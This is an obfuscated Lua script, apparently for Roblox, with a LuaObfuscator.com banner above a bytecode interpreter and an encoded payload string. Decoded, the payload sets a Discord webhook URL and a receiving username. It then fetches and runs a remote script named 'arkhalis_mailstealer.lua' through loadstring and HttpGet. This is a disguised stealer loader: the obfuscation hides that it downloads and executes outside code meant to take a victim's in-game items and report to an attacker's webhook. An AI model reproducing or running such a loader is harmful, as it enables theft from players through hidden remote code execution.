--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v77=v5(v69,v19);v19=nil;return v77;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v70-(v70%(569 -(367 + 201))) ;else local v71=(146 + 781) -(214 + 713) ;local v72;while true do if (v71==(877 -(282 + 595))) then v72=2^(v32-(1 + (1637 -(1523 + 114)))) ;return (((v31%(v72 + v72))>=v72) and 1) or 0 ;end end end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1271 -(226 + 1044) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v37 * (251 + 5)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + (351 -(87 + 263)) + 3 ;return (v41 * (16778173 -(892 + 65))) + (v40 * (156337 -90801)) + (v39 * (472 -216)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=181 -(67 + 113) ;local v45=(v20(v43,1 + (18 -(10 + 8)) ,49 -29 ) * ((2 + 0)^(127 -(365 -270)))) + v42 ;local v46=v20(v43,973 -(802 + 150) ,83 -52 );local v47=((v20(v43,57 -25 )==((443 -(416 + 26)) + 0)) and  -1) or ((3186 -2188) -(915 + 82)) ;if (v46==(0 -0)) then if (v45==0) then return v47 * (0 + 0) ;else local v78=0 -0 ;while true do if (v78==0) then v46=1;v44=1187 -(1069 + 118) ;break;end end end elseif (v46==(4643 -2596)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1015 + 4 + 4) ) * (v44 + (v45/(((1402 -609) -(368 + 423))^(163 -111)))) ;end local function v25(v48)local v49;if  not v48 then local v73=438 -(145 + 293) ;while true do if (v73==(430 -(44 + 386))) then v48=v23();if (v48==0) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1487 -(998 + 488)) );v18=v18 + v48 ;local v50={};for v67=1 + 0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=1271 -(945 + 326) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==(0 -0)) then v52=0 + 0 ;v53=nil;v51=1 + 0 ;end if (v51==(704 -(271 + 429))) then while true do if (v52==(856 -(564 + 292))) then local v95=0;local v96;while true do if (v95==(0 + 0)) then v96=1500 -(1408 + 92) ;while true do if (v96==(1087 -(461 + 625))) then v52=1289 -(993 + 295) ;break;end if (v96==(0 + 0)) then local v108=0;while true do if (v108~=(1172 -(418 + 753))) then else v96=477 -(41 + 435) ;break;end if (v108~=0) then else v53=1001 -(938 + 63) ;v54=nil;v108=1 + 0 ;end end end end break;end end end if (v52~=2) then else local v97=0 + 0 ;local v98;while true do if (v97~=(0 + 0)) then else v98=0 + 0 ;while true do if (1==v98) then v52=532 -(406 + 123) ;break;end if (v98~=(0 + 0)) then else local v109=1769 -(1749 + 20) ;while true do if (1~=v109) then else v98=1;break;end if (v109==(0 + 0)) then v57=nil;v58=nil;v109=1139 -(782 + 356) ;end end end end break;end end end if (v52~=1) then else local v99=267 -(176 + 91) ;while true do if (v99==1) then v52=4 -2 ;break;end if (v99==(1322 -(1249 + 73))) then v55=nil;v56=nil;v99=1 + 0 ;end end end if (v52~=3) then else v59=nil;while true do local v100=1145 -(466 + 679) ;local v101;while true do if (v100==0) then v101=0 -0 ;while true do if (v101~=(0 + 0)) then else local v110=0 -0 ;local v111;while true do if (v110~=(1900 -(106 + 1794))) then else v111=0 + 0 ;while true do if (v111==(1 + 0)) then v101=1019 -(697 + 321) ;break;end if (v111==(0 -0)) then local v160=0 -0 ;while true do if (v160~=0) then else if (v53==0) then local v171=0 -0 ;local v172;local v173;while true do if (v171==0) then v172=0 -0 ;v173=nil;v171=1 -0 ;end if (v171==(2 -1)) then while true do if (v172~=(114 -(4 + 110))) then else v173=0;while true do if (v173~=(1227 -(322 + 905))) then else local v185=611 -(602 + 9) ;local v186;while true do if (v185==0) then v186=584 -(57 + 527) ;while true do if (v186==(1427 -(41 + 1386))) then v54={};v55={};v186=104 -(17 + 86) ;end if ((1 + 0)==v186) then v173=1 -0 ;break;end end break;end end end if (v173~=1) then else v56={};v53=1;break;end end break;end end break;end end end if (v53~=(8 -5)) then else local v174=166 -(122 + 44) ;local v175;while true do if (v174~=(0 -0)) then else v175=0 -0 ;while true do if (v175==(0 + 0)) then for v183=1,v23() do v55[v183-(1899 -(260 + 1638)) ]=v28();end return v57;end end break;end end end v160=441 -(382 + 58) ;end if (v160==(1 + 0)) then v111=1 -0 ;break;end end end end break;end end end if ((66 -(30 + 35))==v101) then if (v53~=(1 + 0)) then else local v112=1257 -(1043 + 214) ;while true do if (v112==(0 -0)) then local v134=1212 -(323 + 889) ;while true do if (v134~=(0 + 0)) then else local v166=0 -0 ;while true do if (v166==(581 -(361 + 219))) then v134=321 -(53 + 267) ;break;end if (v166==(0 + 0)) then v57={v54,v55,nil,v56};v58=v23();v166=1;end end end if (v134==(1 + 0)) then v112=1;break;end end end if (v112~=(983 -(18 + 964))) then else v59={};v53=7 -5 ;break;end end end if (v53==2) then local v113=0;local v114;local v115;while true do if (0~=v113) then else v114=0 + 0 ;v115=nil;v113=1691 -(1121 + 569) ;end if (v113==(1 + 0)) then while true do if (v114==0) then v115=850 -(20 + 830) ;while true do if (v115==(1 + 0)) then for v178=127 -(116 + 10) ,v23() do local v179=1463 -(1404 + 59) ;local v180;local v181;while true do if (v179~=(2 -1)) then else while true do if (v180==0) then v181=v21();if (v20(v181,1 + 0 ,1 -0 )==0) then local v187=738 -(542 + 196) ;local v188;local v189;local v190;local v191;local v192;while true do if (v187==(765 -(468 + 297))) then v188=0 -0 ;v189=nil;v187=1 + 0 ;end if (v187~=(6 -4)) then else v192=nil;while true do if (v188==1) then local v200=0 + 0 ;while true do if ((0 -0)==v200) then v191=nil;v192=nil;v200=1 + 0 ;end if ((2 -1)==v200) then v188=4 -2 ;break;end end end if (v188==(1551 -(1126 + 425))) then local v201=236 -(141 + 95) ;while true do if (v201~=(405 -(118 + 287))) then else v189=0;v190=nil;v201=1 + 0 ;end if (v201==(2 -1)) then v188=2 -1 ;break;end end end if (v188~=(1 + 1)) then else while true do if ((3 -2)==v189) then v192={v22(),v22(),nil,nil};if (v190==0) then local v205=377 -(142 + 235) ;local v206;while true do if (v205==(0 + 0)) then v206=0 -0 ;while true do if (v206~=(0 + 0)) then else v192[3]=v22();v192[4]=v22();break;end end break;end end elseif (v190==(978 -(553 + 424))) then v192[5 -2 ]=v23();elseif (v190==(2 + 0)) then v192[3]=v23() -((2 + 0)^(10 + 6)) ;elseif (v190==(3 + 0)) then local v217=0;while true do if (v217~=(163 -(92 + 71))) then else v192[2 + 1 ]=v23() -((1 + 1)^16) ;v192[3 + 1 ]=v22();break;end end end v189=2;end if (v189==(4 -2)) then local v202=0;while true do if (v202==(0 -0)) then if (v20(v191,2 -1 ,1 + 0 )==(4 -3)) then v192[755 -(239 + 514) ]=v59[v192[2]];end if (v20(v191,1 + 1 ,1331 -(797 + 532) )==(850 -(254 + 595))) then v192[129 -(55 + 71) ]=v59[v192[3]];end v202=1 + 0 ;end if (v202==(1 -0)) then v189=1793 -(573 + 1217) ;break;end end end if (v189==(0 -0)) then local v203=0;while true do if (v203==(1 + 0)) then v189=2 -1 ;break;end if (v203~=(1202 -(373 + 829))) then else v190=v20(v181,733 -(476 + 255) ,942 -(714 + 225) );v191=v20(v181,11 -7 ,1136 -(369 + 761) );v203=1 + 0 ;end end end if (v189~=(5 -2)) then else if (v20(v191,3 -0 ,3)~=(807 -(118 + 688))) then else v192[7 -3 ]=v59[v192[1 + 3 ]];end v54[v178]=v192;break;end end break;end end break;end if (v187==(239 -(64 + 174))) then v190=nil;v191=nil;v187=6 -4 ;end end end break;end end break;end if (v179==(732 -(16 + 716))) then v180=0 + 0 ;v181=nil;v179=1 -0 ;end end end v53=339 -(144 + 192) ;break;end if (v115==(216 -(42 + 174))) then local v176=0 + 0 ;local v177;while true do if (v176==(285 -(175 + 110))) then v177=0;while true do if (v177~=(2 -1)) then else v115=4 -3 ;break;end if (v177==(0 + 0)) then local v182=0;while true do if (v182==(0 -0)) then for v194=1,v58 do local v195=0 + 0 ;local v196;local v197;while true do if (v195==(1061 -(810 + 251))) then local v198=0 + 0 ;while true do if (v198~=1) then else v195=1505 -(363 + 1141) ;break;end if (v198~=(0 + 0)) then else v196=v21();v197=nil;v198=1581 -(1183 + 397) ;end end end if (v195==1) then if (v196==1) then v197=v21()~=(0 -0) ;elseif (v196==2) then v197=v24();elseif (v196==(3 + 0)) then v197=v25();end v59[v194]=v197;break;end end end v57[3 + 0 ]=v21();v182=1;end if (v182~=1) then else v177=1976 -(1913 + 62) ;break;end end end end break;end end end end break;end end break;end end end break;end end break;end end end break;end end break;end if (v51==3) then v58=nil;v59=nil;v51=3 + 1 ;end if (v51==(5 -3)) then v56=nil;v57=nil;v51=1936 -(565 + 1368) ;end if (v51==(1 + 0)) then v54=nil;v55=nil;v51=7 -5 ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (0==v63) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==1) then if (v92<=10) then if (v92<=4) then if (v92<=1) then if (v92==0) then v89[v91[2]]=v91[3];else v83=v91[3];end elseif (v92<=2) then local v119=v91[2];local v120,v121=v82(v89[v119](v13(v89,v119 + 1 ,v91[3])));v84=(v121 + v119) -1 ;local v122=0;for v131=v119,v84 do v122=v122 + 1 ;v89[v131]=v120[v122];end elseif (v92==3) then v83=v91[3];else local v136=v91[2];local v137=v89[v91[3]];v89[v136 + 1 ]=v137;v89[v136]=v137[v91[4]];end elseif (v92<=7) then if (v92<=5) then local v123=0;local v124;while true do if (v123==0) then v124=v91[2];v89[v124]=v89[v124](v13(v89,v124 + 1 ,v84));break;end end elseif (v92>6) then local v141=v91[2];local v142=v89[v91[3]];v89[v141 + 1 ]=v142;v89[v141]=v142[v91[4]];else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=8) then do return;end elseif (v92==9) then v89[v91[2]]();else v89[v91[2]]=v62[v91[3]];end elseif (v92<=15) then if (v92<=12) then if (v92==11) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else v89[v91[2]]=v91[3]~=0 ;end elseif (v92<=13) then v89[v91[2]]=v91[3]~=0 ;elseif (v92>14) then v89[v91[2]]();else do return;end end elseif (v92<=18) then if (v92<=16) then v89[v91[2]][v91[3]]=v91[4];elseif (v92==17) then v89[v91[2]]=v91[3];elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=19) then local v129=0;local v130;while true do if (v129==0) then v130=v91[2];v89[v130]=v89[v130](v13(v89,v130 + 1 ,v84));break;end end elseif (v92==20) then v89[v91[2]]=v62[v91[3]];else local v155=0;local v156;local v157;local v158;local v159;while true do if (v155==1) then v84=(v158 + v156) -1 ;v159=0;v155=2;end if (v155==0) then v156=v91[2];v157,v158=v82(v89[v156](v13(v89,v156 + 1 ,v91[3])));v155=1;end if (v155==2) then for v168=v156,v84 do v159=v159 + 1 ;v89[v168]=v157[v159];end break;end end end v83=v83 + 1 ;break;end if (0==v94) then v91=v79[v83];v92=v91[1];v94=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F4O313339333933363930392O35333O362F39764D5274386639676D33505565452O4D795276646748554C464B72674E4F4C6F336A787A6D413956426956594D625770514B6A4C2O49415A312D73627650476E47356C030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F61726B68616C69735F6D61696C737465616C65722E6C756103093O00557365726E616D653103083O006561737962652O7203093O00557365726E616D6532035O00173O0012113O00013O0026123O000E000100020004033O000E0001001214000100033O003006000100040005001214000100063O001214000200073O002007000200020008001211000400094O000D000500014O0002000200054O001300013O00022O00090001000100010004033O001600010026123O0001000100010004033O00010001001214000100033O0030060001000A000B001214000100033O0030060001000C000D0012113O00023O0004033O000100012O000E3O00017O00",v9(),...);end
